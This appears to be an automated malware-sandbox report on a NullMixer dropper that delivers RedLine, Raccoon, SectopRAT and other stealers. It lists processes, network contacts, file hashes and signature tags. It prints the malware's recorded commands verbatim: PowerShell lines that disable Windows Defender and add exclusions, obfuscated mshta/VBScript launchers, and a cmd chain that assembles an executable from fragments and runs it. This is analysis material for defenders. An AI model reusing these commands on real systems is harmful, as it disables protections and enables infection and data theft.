PID 2808 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09a48dab921a3bda7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09e3a07534aa.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed094d15aaa9a48.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed096e68af113.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed098e48a54663552b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09c36f786070b6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0911cd5800a45.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09a6fb1d0dd846.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0961d5d40c7b937c7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0937c2dc68a2496.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed094d15aaa9a48.exe

Wed094d15aaa9a48.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe

Wed09e3a07534aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a48dab921a3bda7.exe

Wed09a48dab921a3bda7.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed096e68af113.exe

Wed096e68af113.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe

Wed09c36f786070b6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0988d1c2bd9a37.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe

Wed09a6fb1d0dd846.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0937c2dc68a2496.exe

Wed0937c2dc68a2496.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed098e48a54663552b.exe

Wed098e48a54663552b.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0988d1c2bd9a37.exe

Wed0988d1c2bd9a37.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 272

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe

Wed0911cd5800a45.exe

C:\Users\Admin\AppData\Local\Temp\is-0RSAR.tmp\Wed09a6fb1d0dd846.tmp

"C:\Users\Admin\AppData\Local\Temp\is-0RSAR.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$8018A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe"

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0961d5d40c7b937c7.exe

Wed0961d5d40c7b937c7.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe

"C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe

Wed09f3b13c770637f.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: cloSE ( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe"" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe"" ) do taskkill /f -IM ""%~nXN"" " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\is-K6GVP.tmp\Wed09a6fb1d0dd846.tmp

"C:\Users\Admin\AppData\Local\Temp\is-K6GVP.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$9018A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe" ) do taskkill /f -IM "%~nXN"

C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE

..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA

C:\Windows\SysWOW64\taskkill.exe

taskkill /f -IM "Wed0911cd5800a45.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: cloSE ( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct ( "wSCRIPT.SHEll" ). RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~ + nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W " , 0 , True ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81 &CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~ + nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eChO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>PUVMYbL.81"

C:\Windows\SysWOW64\msiexec.exe

msiexec /y ..\_enU.W

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2808 -s 464

Network

Country Destination Domain Proto
US 8.8.8.8:53 sayanu.xyz udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 propanla.com udp
N/A 127.0.0.1:49296 tcp
N/A 127.0.0.1:49299 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 niemannbest.me udp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 iplogger.org udp
NL 194.104.136.5:46013 tcp
US 104.26.2.46:443 iplogger.org tcp
FI 135.181.129.119:4805 tcp
US 104.26.2.46:443 iplogger.org tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
US 72.84.118.132:8080 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 72.84.118.132:8080 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.82:80 r11.o.lencr.org tcp
US 8.8.8.8:53 www.qxsgxd.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 www.microsoft.com udp
US 23.192.22.93:80 www.microsoft.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp

Files

\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe

MD5 3fce5aacf6f9eb4b34126d0c2a9d36c2
SHA1 5590c4402fcda16fe873f857088b4ee6c38858b1
SHA256 ba64bfa019840bf787c93b9f25b6fcce479be24c43a285258174a1a70b9bbf12
SHA512 ed8b38dc4af79c7271412a44ecdcb7e2df0525f314cc52b700ee2e93612c99ccad78a48b657ba5178595d133ad03ed842f4db71165a933fcba0b540f48db58d7

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/2808-56-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS8763E087\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

\Users\Admin\AppData\Local\Temp\7zS8763E087\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2808-52-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS8763E087\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zS8763E087\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2808-59-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2808-66-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2808-65-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2808-64-0x000000006494A000-0x000000006494F000-memory.dmp

memory/2808-68-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2808-69-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2808-67-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2808-75-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2808-74-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2808-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2808-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2808-71-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2808-70-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a48dab921a3bda7.exe

MD5 3bf8a169c55f8b54700880baee9099d7
SHA1 d411f875744aa2cfba6d239bad723cbff4cf771a
SHA256 66a0b83c76b8041ae88433a681fa0e8fbc851bca23fafbedc13e714d522540d2
SHA512 f75ed04c077fdd12557a197f5a75d6cce64ef9a5e66e8714f0c80e234eb3ae5151c47f02d1baa98e43adcbbdf0d2016a9f2ba092f143f2ea1e1072ab0d194c11

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed096e68af113.exe

MD5 e90750ecf7d4add59391926ccfc15f51
SHA1 6087df6ab46fe798b6eeab860d01c19ef5dbd3d1
SHA256 b840ae32fb4ca7d1ad9679aa51dff5970f4613cdb241ba73dabb5c55f38a5a59
SHA512 8c5b9efc562475932a3a77abfb07603928eaf1c34a5eb46f3984703b129cece013ee5bd0257061afc3d69564a1bd5fd624528cbfe9eb608bde7636c948ed73b9

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe

MD5 6b4f4e37bc557393a93d254fe4626bf3
SHA1 b9950d0223789ae109b43308fcaf93cd35923edb
SHA256 7735018dc0d3c4446f932f0062efc3d109313041326f7f1edc6adcc6028f089d
SHA512 a3c6ee81d3f442c4e7d43584c1544e0f402c2441273c99ed799e15d359698db7ee02e770e3ee763bb95ac2e047f59bca3c3f39600d4d5022f82182b14b1fbc0e

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed094d15aaa9a48.exe

MD5 69c4678681165376014646030a4fe7e4
SHA1 fb110dad415ac036c828b51c38debd34045aa0f3
SHA256 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77
SHA512 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0988d1c2bd9a37.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed098e48a54663552b.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 d7dc7c4758af4c44a161c8f8b6be3136
SHA1 b53863093d657af285d1f81e753fdcfb127aaa2a
SHA256 4942140f3d871f18b5a860cbaf2591bc6909ec4ae6301d50299cb3aa24865a6a
SHA512 103884eac6fb22f0acf9cd545eb4eec5972bee68b545e2b805cc97f1536bf1f2ac1e613d4e4c91927b787c8bf1e0ec67911cffce40564ad9e0c190b76d7a42e3

\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0937c2dc68a2496.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

memory/2420-124-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0961d5d40c7b937c7.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe

MD5 d165e339ef0c057e20eb61347d06d396
SHA1 cb508e60292616b22f2d7a5ab8f763e4c89cf448
SHA256 ef9dd026b0e39e2a1b0169c19446c98a83d4a2487633c109d0e54e40fb7463c8
SHA512 da6ac858c46cb1f8dd68f03e4550c645c85753d0de4dc0752494c737f4d433bb0e40a5a9de336e211c2e06aa9c6a30484f76baef6892d6a8860f558d1d90f580

C:\Users\Admin\AppData\Local\Temp\is-K6GVP.tmp\Wed09a6fb1d0dd846.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/2952-151-0x0000000000090000-0x0000000000098000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-GR96V.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2420-147-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1084-145-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2296-144-0x0000000000400000-0x00000000004BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-GR96V.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/872-159-0x0000000001380000-0x00000000013F0000-memory.dmp

memory/2924-162-0x0000000000030000-0x0000000000046000-memory.dmp

memory/2176-161-0x0000000000CB0000-0x0000000000D22000-memory.dmp

memory/2708-160-0x0000000000F00000-0x0000000000F70000-memory.dmp

memory/2924-165-0x0000000000360000-0x0000000000366000-memory.dmp

memory/2660-182-0x0000000002560000-0x00000000026BD000-memory.dmp

memory/1552-219-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1552-218-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1552-217-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1552-216-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1452-215-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1452-214-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1552-212-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1552-210-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1552-208-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1452-205-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1452-204-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1452-202-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1452-200-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1452-198-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1692-195-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1692-193-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1692-192-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1692-191-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1692-189-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1692-185-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1692-183-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1692-187-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2808-220-0x0000000000400000-0x000000000051C000-memory.dmp

memory/2808-229-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2808-228-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2808-227-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2808-226-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2808-224-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2660-230-0x00000000029D0000-0x0000000002A76000-memory.dmp

memory/2660-234-0x0000000002A80000-0x0000000002B13000-memory.dmp

memory/2660-232-0x0000000002A80000-0x0000000002B13000-memory.dmp

memory/2660-231-0x0000000002A80000-0x0000000002B13000-memory.dmp

memory/2644-235-0x0000000000400000-0x0000000002DAA000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win10v2004-20241007-en

Max time kernel

120s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

Raccoon

stealer raccoon

Raccoon Stealer V1 payload

Description Indicator Process Target
N/A N/A N/A N/A

Raccoon family

raccoon

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

